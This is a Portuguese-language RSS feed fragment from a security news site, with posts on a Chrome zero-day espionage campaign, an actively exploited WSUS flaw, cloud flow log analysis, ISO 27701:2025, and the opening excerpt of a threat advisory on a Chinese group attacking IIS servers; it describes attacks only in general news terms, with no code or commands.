					<description><![CDATA[<p>A Kaspersky identificou uma campanha de ciberespionagem sofisticada explorando a primeira vulnerabilidade zero-day do Chrome em 2025, associada a ferramentas utilizadas pelo novo spyware do Hacking Team – agora rebatizado como Memento Labs. A falha, rastreada como CVE-2025-2783, é descrita como uma vulnerabilidade de sandbox escape no navegador Chrome e foi explorada em ataques direcionados&#8230; <span class="excerpt-more"><a href="https://seginfo.com.br/2025/10/27/zero-day-do-chrome-e-explorado-em-campanha-de-espionagem-digital/">Read More</a></span></p>
<p>The post <a href="https://seginfo.com.br/2025/10/27/zero-day-do-chrome-e-explorado-em-campanha-de-espionagem-digital/">Zero-Day do Chrome é explorado em campanha de espionagem digital</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" width="1024" height="683" src="https://seginfo.com.br/wp-content/uploads/2025/07/AdobeStock_1364219577_Editorial_Use_Only-1024x683.jpeg" alt="" class="wp-image-72242" style="aspect-ratio:1.4992888417882142;width:702px;height:auto" srcset="https://seginfo.com.br/wp-content/uploads/2025/07/AdobeStock_1364219577_Editorial_Use_Only-1024x683.jpeg 1024w, https://seginfo.com.br/wp-content/uploads/2025/07/AdobeStock_1364219577_Editorial_Use_Only-300x200.jpeg 300w, https://seginfo.com.br/wp-content/uploads/2025/07/AdobeStock_1364219577_Editorial_Use_Only-150x100.jpeg 150w, https://seginfo.com.br/wp-content/uploads/2025/07/AdobeStock_1364219577_Editorial_Use_Only-768x512.jpeg 768w, https://seginfo.com.br/wp-content/uploads/2025/07/AdobeStock_1364219577_Editorial_Use_Only-1536x1024.jpeg 1536w, https://seginfo.com.br/wp-content/uploads/2025/07/AdobeStock_1364219577_Editorial_Use_Only-2048x1365.jpeg 2048w, https://seginfo.com.br/wp-content/uploads/2025/07/AdobeStock_1364219577_Editorial_Use_Only-1170x780.jpeg 1170w, https://seginfo.com.br/wp-content/uploads/2025/07/AdobeStock_1364219577_Editorial_Use_Only-720x480.jpeg 720w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>


<p class="wp-block-paragraph">A Kaspersky identificou uma campanha de ciberespionagem sofisticada explorando a primeira vulnerabilidade <strong>zero-day</strong> do Chrome em 2025, associada a ferramentas utilizadas pelo novo spyware do <strong>Hacking Team</strong> – agora rebatizado como <strong>Memento Labs</strong>.</p>



<p class="wp-block-paragraph">A falha, rastreada como <strong><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-2783" target="_blank" rel="noreferrer noopener nofollow">CVE-2025-2783</a></strong>, é descrita como uma vulnerabilidade de <em>sandbox escape</em> no navegador Chrome e foi explorada em ataques direcionados a setores de <strong>educação, finanças, governo, mídia e pesquisa</strong> na Rússia. Uma vulnerabilidade semelhante também afetou o Firefox, catalogada como <strong>CVE-2025-2857</strong>.</p>



<h3 class="wp-block-heading" id="h-operacao-forumtroll-a-campanha-de-espionagem">Operação ForumTroll: a campanha de espionagem</h3>



<p class="wp-block-paragraph">Batizada de <strong>Operação ForumTroll</strong>, a campanha utilizava <strong>e-mails de phishing</strong> disfarçados como convites para fóruns online. As mensagens continham links personalizados e de curta duração que redirecionavam as vítimas para sites maliciosos hospedando o código explorador da vulnerabilidade do Chrome.</p>



<p class="wp-block-paragraph">Uma vez executado, o código <strong>validava o usuário, burlava o sandbox do navegador e injetava shellcode</strong>, o que levava à instalação de um <em>malware loader</em>. Para manter persistência, o código criava novas entradas no registro do Windows, sequestrando a ordem de busca de objetos COM do sistema operacional.</p>



<h3 class="wp-block-heading" id="h-leetagent-o-spyware-em-acao">LeetAgent: o spyware em ação</h3>



<p class="wp-block-paragraph">A carga final da Operação ForumTroll era o <strong>LeetAgent</strong>, um spyware escrito em <em>leetspeak</em> capaz de <strong>registrar teclas digitadas, roubar arquivos e receber comandos remotos</strong> via HTTPS. O comando e controle (C&amp;C) do malware estava hospedado na infraestrutura em nuvem da <strong>Fastly.net</strong>.</p>



<p class="wp-block-paragraph">Segundo a Kaspersky, o LeetAgent tem sido utilizado desde <strong>2022</strong> em ataques direcionados a organizações na <strong>Rússia e Bielorrússia</strong>, e em alguns casos serviu como porta de entrada para uma ameaça mais avançada — o <strong>Dante</strong>, spyware desenvolvido pela empresa italiana <strong>Memento Labs</strong> (antiga Hacking Team).</p>



<h3 class="wp-block-heading" id="h-hacking-team-memento-labs-e-o-retorno-do-spyware-dante">Hacking Team, Memento Labs e o retorno do spyware “Dante”</h3>



<p class="wp-block-paragraph">Fundada em 2003, a Hacking Team ficou famosa por seu software de vigilância <strong>Remote Control Systems (RCS)</strong>, também conhecido como <strong>Da Vinci</strong>, amplamente utilizado por governos ao redor do mundo. Após o vazamento de dados em 2015, a empresa foi adquirida em 2019 pelo grupo <strong>InTheCyber</strong> e passou a se chamar <strong>Memento Labs</strong>.</p>



<p class="wp-block-paragraph">A nova ferramenta de espionagem, <strong>Dante</strong>, apresenta características semelhantes ao antigo RCS, com foco em <strong>evasão de detecção e análise forense</strong>. O spyware utiliza um <strong>orquestrador modular</strong>, que carrega componentes sob demanda e verifica o ambiente infectado. Caso não receba comandos do servidor C&amp;C por um período determinado, <strong>ele se autodeleta do sistema</strong>, dificultando a investigação.</p>



<h3 class="wp-block-heading" id="h-relacoes-entre-as-campanhas">Relações entre as campanhas</h3>



<p class="wp-block-paragraph">Embora o Dante não tenha sido utilizado diretamente na Operação ForumTroll, a Kaspersky destaca <strong>semelhanças de código e técnicas</strong> entre essa operação e outras em que o spyware foi empregado. Isso inclui <strong>padrões de persistência, caminhos de arquivos, dados ocultos em fontes e código compartilhado</strong> entre o exploit, o loader e o próprio Dante.</p>



<p class="wp-block-paragraph">Essas descobertas reforçam a crescente <strong>sofisticação e modularidade das campanhas de espionagem digital</strong> patrocinadas por Estados, bem como o reaproveitamento de ferramentas originalmente criadas para fins de vigilância por empresas privadas.</p>



<p class="wp-block-paragraph">Para saber mais, clique <strong><a href="https://www.securityweek.com/chrome-zero-day-exploitation-linked-to-hacking-team-spyware/" target="_blank" rel="noreferrer noopener nofollow">aqui</a></strong>.</p>
<p>The post <a href="https://seginfo.com.br/2025/10/27/zero-day-do-chrome-e-explorado-em-campanha-de-espionagem-digital/">Zero-Day do Chrome é explorado em campanha de espionagem digital</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></content:encoded>
					
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">73399</post-id>	<dc:creator>contato@clavis.com.br (Clavis Segurança da Informação)</dc:creator></item>
		<item>
		<title>Vulnerabilidade crítica no WSUS do Windows Server é explorada ativamente</title>
		<link>https://seginfo.com.br/2025/10/24/vulnerabilidade-critica-no-wsus-do-windows-server-e-explorada-ativamente/</link>
		
		
		<pubDate>Fri, 24 Oct 2025 19:46:39 +0000</pubDate>
				<category><![CDATA[Uncategorized]]></category>
		<guid isPermaLink="false">https://seginfo.com.br/?p=73357</guid>

					<description><![CDATA[<p>A Microsoft lançou na quinta-feira (23/10) uma atualização emergencial para corrigir uma vulnerabilidade crítica no Windows Server Update Service (WSUS). Horas após a liberação do patch, pesquisadores já detectaram casos de exploração ativa da falha. O WSUS é um componente essencial do sistema operacional Windows Server, utilizado por administradores de TI para gerenciar e distribuir&#8230; <span class="excerpt-more"><a href="https://seginfo.com.br/2025/10/24/vulnerabilidade-critica-no-wsus-do-windows-server-e-explorada-ativamente/">Read More</a></span></p>
<p>The post <a href="https://seginfo.com.br/2025/10/24/vulnerabilidade-critica-no-wsus-do-windows-server-e-explorada-ativamente/">Vulnerabilidade crítica no WSUS do Windows Server é explorada ativamente</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" width="1024" height="683" src="https://seginfo.com.br/wp-content/uploads/2025/10/AdobeStock_291645251_Editorial_Use_Only-1024x683.jpeg" alt="" class="wp-image-73359" style="aspect-ratio:1.4992888417882142;width:670px;height:auto" srcset="https://seginfo.com.br/wp-content/uploads/2025/10/AdobeStock_291645251_Editorial_Use_Only-1024x683.jpeg 1024w, https://seginfo.com.br/wp-content/uploads/2025/10/AdobeStock_291645251_Editorial_Use_Only-300x200.jpeg 300w, https://seginfo.com.br/wp-content/uploads/2025/10/AdobeStock_291645251_Editorial_Use_Only-150x100.jpeg 150w, https://seginfo.com.br/wp-content/uploads/2025/10/AdobeStock_291645251_Editorial_Use_Only-768x512.jpeg 768w, https://seginfo.com.br/wp-content/uploads/2025/10/AdobeStock_291645251_Editorial_Use_Only-1536x1025.jpeg 1536w, https://seginfo.com.br/wp-content/uploads/2025/10/AdobeStock_291645251_Editorial_Use_Only-2048x1367.jpeg 2048w, https://seginfo.com.br/wp-content/uploads/2025/10/AdobeStock_291645251_Editorial_Use_Only-1170x781.jpeg 1170w, https://seginfo.com.br/wp-content/uploads/2025/10/AdobeStock_291645251_Editorial_Use_Only-1535x1024.jpeg 1535w, https://seginfo.com.br/wp-content/uploads/2025/10/AdobeStock_291645251_Editorial_Use_Only-719x480.jpeg 719w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>


<p class="wp-block-paragraph">A Microsoft lançou na quinta-feira (23/10) uma atualização emergencial para corrigir uma vulnerabilidade crítica no <strong>Windows Server Update Service (WSUS)</strong>. Horas após a liberação do patch, pesquisadores já detectaram <strong>casos de exploração ativa da falha</strong>.</p>



<p class="wp-block-paragraph">O WSUS é um componente essencial do sistema operacional <strong>Windows Server</strong>, utilizado por administradores de TI para gerenciar e distribuir centralmente atualizações e correções de produtos Microsoft em redes corporativas.</p>



<p class="wp-block-paragraph">De acordo com o comunicado da empresa, a falha — identificada como <strong>CVE-2025-59287</strong> — é uma <strong>vulnerabilidade de execução remota de código (RCE)</strong> que afeta as versões <strong>Windows Server 2012, 2016, 2019, 2022 e 2025</strong>. O problema permite que <strong>agentes mal-intencionados executem códigos arbitrários com privilégios de sistema</strong>, sem necessidade de autenticação prévia.</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p class="wp-block-paragraph">“Um invasor remoto e não autenticado pode enviar um evento especialmente criado que aciona uma desserialização insegura de objetos, resultando em execução remota de código”, explicou a Microsoft.</p>
</blockquote>



<p class="wp-block-paragraph">A falha foi detalhada em 18 de outubro pela empresa de segurança <strong>HawkTrace</strong>, que também publicou um <strong>exploit de prova de conceito (PoC)</strong> demonstrando a vulnerabilidade. Segundo a companhia, <strong>o código pode ser explorado para obter controle total sobre sistemas afetados</strong>.</p>



<p class="wp-block-paragraph">Na sexta-feira (24), a <strong>Eye Security</strong> relatou ter identificado <strong>exploração ativa da CVE-2025-59287</strong> em ambientes reais. Estimativas da empresa indicam que <strong>cerca de 2.500 instâncias de WSUS em todo o mundo</strong> continuam expostas. O <strong>Centro Nacional de Segurança Cibernética do governo holandês (NCSC-NL)</strong> também confirmou ter detectado atividades maliciosas explorando a vulnerabilidade.</p>



<p class="wp-block-paragraph">Embora a função WSUS Server Role <strong>não esteja habilitada por padrão</strong> no Windows Server, administradores que utilizam o serviço devem aplicar <strong>imediatamente as atualizações disponibilizadas pela Microsoft</strong>. Como medida temporária, a desativação do WSUS pode mitigar o risco até a aplicação do patch definitivo.</p>



<p class="wp-block-paragraph">A Microsoft classificou o caso como <strong>“exploração mais provável”</strong> em sua avaliação de risco, reforçando a urgência da correção para prevenir ataques direcionados.</p>



<p class="wp-block-paragraph">Para saber mais, clique <strong><a href="https://www.securityweek.com/critical-windows-server-wsus-vulnerability-exploited-in-the-wild/" target="_blank" rel="noreferrer noopener nofollow">aqui</a></strong>.</p>
<p>The post <a href="https://seginfo.com.br/2025/10/24/vulnerabilidade-critica-no-wsus-do-windows-server-e-explorada-ativamente/">Vulnerabilidade crítica no WSUS do Windows Server é explorada ativamente</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></content:encoded>
					
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">73357</post-id>	<dc:creator>contato@clavis.com.br (Clavis Segurança da Informação)</dc:creator></item>
		<item>
		<title>Fortalecendo a segurança com logs de fluxo em nuvem</title>
		<link>https://seginfo.com.br/2025/10/17/fortalecendo-a-seguranca-com-logs-de-fluxo-em-nuvem/</link>
		
		
		<pubDate>Fri, 17 Oct 2025 21:06:49 +0000</pubDate>
				<category><![CDATA[Uncategorized]]></category>
		<guid isPermaLink="false">https://seginfo.com.br/?p=73289</guid>

					<description><![CDATA[<p>Empresas e organizações de diversos setores — incluindo instituições governamentais e militares — estão cada vez mais adotando soluções em nuvem pela flexibilidade, escalabilidade e redução de custos que oferecem. No entanto, esse movimento também exige uma nova mentalidade sobre responsabilidade compartilhada em segurança: enquanto os provedores de serviços em nuvem (CSPs) garantem a proteção&#8230; <span class="excerpt-more"><a href="https://seginfo.com.br/2025/10/17/fortalecendo-a-seguranca-com-logs-de-fluxo-em-nuvem/">Read More</a></span></p>
<p>The post <a href="https://seginfo.com.br/2025/10/17/fortalecendo-a-seguranca-com-logs-de-fluxo-em-nuvem/">Fortalecendo a segurança com logs de fluxo em nuvem</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" width="1024" height="576" src="https://seginfo.com.br/wp-content/uploads/2025/10/Img-Nuvem-System-Seginfo-1920x1080-1-1024x576.png" alt="" class="wp-image-73292" style="width:684px;height:auto" srcset="https://seginfo.com.br/wp-content/uploads/2025/10/Img-Nuvem-System-Seginfo-1920x1080-1-1024x576.png 1024w, https://seginfo.com.br/wp-content/uploads/2025/10/Img-Nuvem-System-Seginfo-1920x1080-1-300x169.png 300w, https://seginfo.com.br/wp-content/uploads/2025/10/Img-Nuvem-System-Seginfo-1920x1080-1-150x84.png 150w, https://seginfo.com.br/wp-content/uploads/2025/10/Img-Nuvem-System-Seginfo-1920x1080-1-768x432.png 768w, https://seginfo.com.br/wp-content/uploads/2025/10/Img-Nuvem-System-Seginfo-1920x1080-1-1536x864.png 1536w, https://seginfo.com.br/wp-content/uploads/2025/10/Img-Nuvem-System-Seginfo-1920x1080-1-1170x658.png 1170w, https://seginfo.com.br/wp-content/uploads/2025/10/Img-Nuvem-System-Seginfo-1920x1080-1-1820x1024.png 1820w, https://seginfo.com.br/wp-content/uploads/2025/10/Img-Nuvem-System-Seginfo-1920x1080-1-853x480.png 853w, https://seginfo.com.br/wp-content/uploads/2025/10/Img-Nuvem-System-Seginfo-1920x1080-1.png 1920w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>


<p class="wp-block-paragraph">Empresas e organizações de diversos setores — incluindo instituições governamentais e militares — estão cada vez mais adotando soluções em nuvem pela flexibilidade, escalabilidade e redução de custos que oferecem. No entanto, esse movimento também exige uma nova mentalidade sobre <strong>responsabilidade compartilhada em segurança</strong>: enquanto os provedores de serviços em nuvem (CSPs) garantem a proteção da infraestrutura, cabe às empresas que contratam o serviço zelar pela segurança das aplicações e dados hospedados.</p>



<p class="wp-block-paragraph">Entre as ferramentas mais valiosas para apoiar essa responsabilidade estão os <strong>logs de fluxo em nuvem (cloud flow logs)</strong> — registros que detalham o tráfego de rede entre os endpoints hospedados na nuvem. Esses logs ajudam analistas a entender como os serviços estão sendo utilizados, identificar padrões de acesso anômalos e detectar comportamentos maliciosos ou uso indevido de recursos.</p>



<h2 class="wp-block-heading" id="h-o-que-sao-os-logs-de-fluxo-em-nuvem"><strong>O que são os logs de fluxo em nuvem?</strong></h2>



<p class="wp-block-paragraph">Os <strong>cloud flow logs</strong> reúnem informações sobre o tráfego que entra e sai de máquinas virtuais, sub-redes e grupos de segurança na nuvem. Diferentemente das soluções on-premises, que capturam o tráfego de toda a rede via sensores, na nuvem os próprios hosts ou VPCs (Virtual Private Clouds) geram os registros.</p>



<p class="wp-block-paragraph">Esses logs não são projetados apenas para retenção a longo prazo, mas são essenciais para fornecer <strong>contexto histórico</strong> às atividades de rede. Eles permitem que as equipes de segurança diferenciem atividades esperadas, anômalas ou potencialmente maliciosas — aprimorando a precisão de alertas e relatórios.</p>



<p class="wp-block-paragraph">A coleta contínua desses logs permite identificar três tipos principais de observações:</p>



<ul class="wp-block-list">
<li><strong>Eventos</strong> — ações isoladas com implicações de segurança, sejam benignas (algo que deveria ocorrer) ou maliciosas (algo que compromete a segurança);<br></li>



<li><strong>Padrões</strong> — conjuntos de eventos que indicam comportamento recorrente, como medidas defensivas ou tentativas de ataque;<br></li>



<li><strong>Tendências</strong> — sequências de eventos que evidenciam mudanças graduais no comportamento da rede, podendo indicar tanto ajustes operacionais quanto ameaças em evolução.<br></li>
</ul>



<p class="wp-block-paragraph"><strong>Desafios na análise de logs em múltiplas nuvens</strong></p>



<p class="wp-block-paragraph">Cada provedor de nuvem — como AWS, Azure e Google Cloud — possui <strong>formatos e intervalos de coleta diferentes</strong>. Isso inclui variações em como o tráfego é agregado (por exemplo, registros a cada 1 ou 5 minutos), no método de amostragem (todos os pacotes ou apenas uma fração) e até na representação dos dados (endereços IP, identificadores de instância, formatos de tempo, etc.).</p>



<p class="wp-block-paragraph">Essas diferenças tornam a <strong>correlação entre logs de provedores distintos</strong> um desafio técnico relevante. Sem um tratamento adequado dessas variações, a fusão dos dados pode gerar interpretações imprecisas e dificultar a visualização de comportamentos maliciosos distribuídos entre ambientes híbridos ou multi-cloud.</p>



<h2 class="wp-block-heading" id="h-tres-abordagens-para-analisar-logs-de-fluxo-em-nuvem"><strong>Três abordagens para analisar logs de fluxo em nuvem</strong></h2>



<p class="wp-block-paragraph">As empresas que desejam melhorar a visibilidade e a segurança de seus ambientes em nuvem podem adotar diferentes abordagens analíticas para lidar com essas diferenças entre provedores. Abaixo, destacamos três estratégias comuns:</p>



<h3 class="wp-block-heading" id="h-1-analise-separada-por-provedor"><strong>1. Análise separada por provedor</strong></h3>



<p class="wp-block-paragraph">Nesta abordagem, os logs de cada nuvem são analisados individualmente, respeitando o formato e a estrutura específicos de cada CSP. Essa estratégia é mais simples de implementar e ideal para quem atua predominantemente em um único ambiente.</p>



<p class="wp-block-paragraph">Entretanto, ela limita a visão global, já que <strong>não permite correlacionar eventos</strong> entre diferentes nuvens, o que pode ocultar padrões de ataque que atravessam múltiplas plataformas.</p>



<h3 class="wp-block-heading" id="h-2-analise-separada-com-reconciliacao-de-resultados"><strong>2. Análise separada com reconciliação de resultados</strong></h3>



<p class="wp-block-paragraph">Aqui, cada provedor é analisado de forma independente, mas os resultados passam por um processo de <strong>normalização</strong> — padronizando endereços IP, formatos de tempo e outras variáveis — para permitir a comparação posterior.</p>



<p class="wp-block-paragraph">Essa abordagem oferece um <strong>equilíbrio entre detalhamento e integração</strong>, possibilitando a identificação de padrões comuns em diferentes nuvens sem sacrificar totalmente a granularidade dos dados.</p>



<h3 class="wp-block-heading" id="h-3-analise-comum-e-integrada"><strong>3. Análise comum e integrada</strong></h3>



<p class="wp-block-paragraph">A abordagem mais avançada é transformar os logs de diferentes provedores em um <strong>formato unificado</strong> (como JSON ou CSV) e armazená-los em um repositório central. Dessa forma, é possível realizar análises abrangentes e automatizadas sobre todos os dados de tráfego da organização, independentemente do provedor.</p>



<p class="wp-block-paragraph">Embora ofereça uma visão mais ampla e estratégica, essa opção exige <strong>maior capacidade de processamento, custos de transferência de dados</strong> e rigorosas políticas de controle de acesso.</p>



<h2 class="wp-block-heading" id="h-o-futuro-da-analise-de-logs-em-nuvem"><strong>O futuro da análise de logs em nuvem</strong></h2>



<p class="wp-block-paragraph">A análise de <strong>cloud flow logs</strong> continua evoluindo, com novas ferramentas e metodologias sendo desenvolvidas para integrar dados de múltiplas fontes, como <strong>CloudTrail, S3 logs e outras telemetrias específicas dos provedores</strong>. A combinação dessas fontes permite criar um retrato mais detalhado das atividades em nuvem e fortalecer as defesas contra ameaças.</p>



<p class="wp-block-paragraph">Além disso, há um movimento crescente para <strong>correlacionar logs de fluxo com Táticas, Técnicas e Procedimentos (TTPs)</strong> conhecidos, mapeando comportamentos observados em relação a catálogos como o MITRE ATT&amp;CK — o que amplia significativamente as capacidades de detecção e resposta.</p>



<p class="wp-block-paragraph">É fundamental adotar <strong>políticas inteligentes de retenção de logs</strong>. Guardar todos os dados indefinidamente pode ser caro e desnecessário, mas reter logs críticos por tempo insuficiente pode ocultar indícios de ataques sofisticados e de longa duração.</p>



<p class="wp-block-paragraph">Concluindo, os <strong>logs de fluxo em nuvem</strong> são uma ferramenta essencial para fortalecer a segurança digital em ambientes modernos e distribuídos. Ao compreender as diferentes abordagens para coletar, analisar e correlacionar esses dados, as organizações podem ganhar visibilidade profunda sobre suas operações, detectar ameaças com antecedência e garantir uma postura de segurança mais proativa e eficaz.</p>



<p class="wp-block-paragraph">Se a sua empresa busca <strong>centralizar a gestão da segurança da informação, monitorar vulnerabilidades e ter uma visão unificada de seus ativos e riscos</strong>, conheça a <a href="https://clavis.com.br/plataforma-ciberseguranca-unificada/" target="_blank" rel="noreferrer noopener"><strong>Plataforma de Cibersegurança Unificada da Clavis</strong></a>. Com ela, você eleva o nível de proteção do seu ambiente em nuvem e on-premises, integrando monitoramento, análise e resposta em um único painel inteligente.</p>



<p class="wp-block-paragraph">Para saber mais, clique <strong><a href="https://www.sei.cmu.edu/blog/enhancing-security-with-cloud-flow-logs/" target="_blank" rel="noreferrer noopener nofollow">aqui</a></strong>.</p>
<p>The post <a href="https://seginfo.com.br/2025/10/17/fortalecendo-a-seguranca-com-logs-de-fluxo-em-nuvem/">Fortalecendo a segurança com logs de fluxo em nuvem</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></content:encoded>
					
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">73289</post-id>	<dc:creator>contato@clavis.com.br (Clavis Segurança da Informação)</dc:creator></item>
		<item>
		<title>Nova versão da ISO 27701 reforça independência e exige mais maturidade das empresas em privacidade de dados</title>
		<link>https://seginfo.com.br/2025/10/15/nova-versao-da-iso-27701-reforca-independencia-e-exige-mais-maturidade-das-empresas-em-privacidade-de-dados/</link>
		
		
		<pubDate>Wed, 15 Oct 2025 18:11:59 +0000</pubDate>
				<category><![CDATA[Uncategorized]]></category>
		<guid isPermaLink="false">https://seginfo.com.br/?p=73267</guid>

					<description><![CDATA[<p>Norma publicada em 2025 se torna autônoma em relação à ISO 27001 e amplia o alinhamento com legislações globais de proteção de dados, como a LGPD e o GDPR. A privacidade de dados deixou de ser apenas um diferencial competitivo e se consolidou como um pilar essencial para a confiança e a sustentabilidade das organizações.&#8230; <span class="excerpt-more"><a href="https://seginfo.com.br/2025/10/15/nova-versao-da-iso-27701-reforca-independencia-e-exige-mais-maturidade-das-empresas-em-privacidade-de-dados/">Read More</a></span></p>
<p>The post <a href="https://seginfo.com.br/2025/10/15/nova-versao-da-iso-27701-reforca-independencia-e-exige-mais-maturidade-das-empresas-em-privacidade-de-dados/">Nova versão da ISO 27701 reforça independência e exige mais maturidade das empresas em privacidade de dados</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p class="wp-block-paragraph"><strong>Norma publicada em 2025 se torna autônoma em relação à ISO 27001 e amplia o alinhamento com legislações globais de proteção de dados, como a LGPD e o GDPR.</strong></p>


<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" width="1024" height="576" src="https://seginfo.com.br/wp-content/uploads/2025/10/Img-ISO-27701-1920x1080-1-1024x576.png" alt="" class="wp-image-73273" style="width:772px;height:auto" srcset="https://seginfo.com.br/wp-content/uploads/2025/10/Img-ISO-27701-1920x1080-1-1024x576.png 1024w, https://seginfo.com.br/wp-content/uploads/2025/10/Img-ISO-27701-1920x1080-1-300x169.png 300w, https://seginfo.com.br/wp-content/uploads/2025/10/Img-ISO-27701-1920x1080-1-150x84.png 150w, https://seginfo.com.br/wp-content/uploads/2025/10/Img-ISO-27701-1920x1080-1-768x432.png 768w, https://seginfo.com.br/wp-content/uploads/2025/10/Img-ISO-27701-1920x1080-1-1536x864.png 1536w, https://seginfo.com.br/wp-content/uploads/2025/10/Img-ISO-27701-1920x1080-1-1170x658.png 1170w, https://seginfo.com.br/wp-content/uploads/2025/10/Img-ISO-27701-1920x1080-1-1820x1024.png 1820w, https://seginfo.com.br/wp-content/uploads/2025/10/Img-ISO-27701-1920x1080-1-853x480.png 853w, https://seginfo.com.br/wp-content/uploads/2025/10/Img-ISO-27701-1920x1080-1.png 1920w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>


<p class="wp-block-paragraph">A privacidade de dados deixou de ser apenas um diferencial competitivo e se consolidou como um pilar essencial para a confiança e a sustentabilidade das organizações. Com a publicação da nova versão da <strong>ISO 27701:2025</strong> nesta quarta-feira, empresas de todos os portes e setores devem se preparar para um cenário mais robusto e exigente na gestão da informação pessoal.</p>



<p class="wp-block-paragraph">A grande novidade da atualização é a <strong>independência normativa</strong> em relação à <strong>ISO 27001</strong> (Sistema de Gestão de Segurança da Informação – SGSI). O novo texto estabelece a ISO 27701 como uma norma autônoma para a implementação de sistemas de gestão da privacidade (PIMS), permitindo que organizações adotem controles de privacidade mesmo sem possuir um SGSI formalizado.</p>



<h3 class="wp-block-heading" id="h-mudancas-e-alinhamentos-globais"><strong>Mudanças e alinhamentos globais</strong></h3>



<p class="wp-block-paragraph">A ISO 27701:2025 chega com o objetivo de <strong>aprofundar o alinhamento com legislações internacionais de proteção de dados</strong>, como a <strong>LGPD</strong>, no Brasil, e o <strong>GDPR</strong>, na Europa. Além disso, a revisão reforça o foco em controles específicos de privacidade, eliminando diretrizes não relacionadas ao tema e modernizando seu conteúdo frente às novas realidades tecnológicas e legais.</p>



<p class="wp-block-paragraph">A norma também foi atualizada para garantir compatibilidade com a <strong>ISO/IEC 27001:2022</strong>, refletindo práticas contemporâneas de segurança e governança da informação.</p>



<h3 class="wp-block-heading" id="h-desafios-na-implementacao"><strong>Desafios na implementação</strong></h3>



<p class="wp-block-paragraph">A adoção da nova versão traz consigo uma série de desafios para as organizações. Entre os principais estão:</p>



<ul class="wp-block-list">
<li><strong>•</strong> <strong>Complexidade técnica e legal:</strong> compreender as exigências da norma e adaptá-las à legislação vigente exige conhecimento especializado em segurança da informação e direito digital.</li>



<li><strong>•</strong> <strong>Engajamento da liderança:</strong> o sucesso do PIMS depende do comprometimento da alta direção, que precisa destinar recursos e apoiar a mudança cultural.</li>



<li><strong><strong>•</strong></strong> <strong>Cultura organizacional:</strong> mais do que tecnologia, a privacidade demanda uma mentalidade coletiva voltada à proteção de dados.</li>



<li><strong>•</strong> <strong>Mapeamento e classificação:</strong> identificar fluxos e locais de armazenamento de dados pessoais é essencial para a conformidade.</li>



<li><strong><strong>•</strong></strong> <strong>Integração com sistemas existentes:</strong> alinhar o PIMS a estruturas já certificadas em ISO 27001 requer planejamento.</li>



<li><strong>•</strong> <strong>Monitoramento contínuo:</strong> manter o sistema atualizado diante de novas ameaças e exigências regulatórias é um processo permanente.</li>
</ul>



<h3 class="wp-block-heading" id="h-beneficios-e-oportunidades"><strong>Benefícios e oportunidades</strong></h3>



<p class="wp-block-paragraph">Apesar das barreiras, os <strong>benefícios da certificação ISO 27701:2025</strong> são significativos. Além de <strong>reforçar a confiança</strong> de clientes e parceiros, a norma facilita a <strong>conformidade legal</strong>, reduz riscos de incidentes e oferece <strong>vantagem competitiva</strong> no mercado.</p>



<p class="wp-block-paragraph">A atualização também impulsiona a <strong>governança de dados</strong>, otimizando processos internos e fortalecendo a base estratégica das organizações.</p>



<p class="wp-block-paragraph"></p>
<p>The post <a href="https://seginfo.com.br/2025/10/15/nova-versao-da-iso-27701-reforca-independencia-e-exige-mais-maturidade-das-empresas-em-privacidade-de-dados/">Nova versão da ISO 27701 reforça independência e exige mais maturidade das empresas em privacidade de dados</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></content:encoded>
					
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">73267</post-id>	<dc:creator>contato@clavis.com.br (Clavis Segurança da Informação)</dc:creator></item>
		<item>
		<title>Threat Advisor – Campanha de grupo Chinês mira em empresas brasileiras</title>
		<link>https://seginfo.com.br/2025/10/10/threat-advisor-campanha-de-grupo-chines-mira-em-empresas-brasileiras/</link>
		
		
		<pubDate>Fri, 10 Oct 2025 19:13:30 +0000</pubDate>
				<category><![CDATA[Uncategorized]]></category>
		<guid isPermaLink="false">https://seginfo.com.br/?p=73233</guid>

					<description><![CDATA[<p>Um grupo de cibercrime chinês, nomeado como&#160;UAT-8099, está ativamente envolvido em campanhas de fraude de SEO (Search Engine Optimization) e no roubo de credenciais, arquivos de configuração e certificados. A principal tática identificada em uso do grupo é o comprometimento de servidores&#160;Internet Information Services&#160;(IIS) vulneráveis, com o objetivo de&#160; instalar o malware&#160;BadIIS. As operações foram&#8230; <span class="excerpt-more"><a href="https://seginfo.com.br/2025/10/10/threat-advisor-campanha-de-grupo-chines-mira-em-empresas-brasileiras/">Read More</a></span></p>
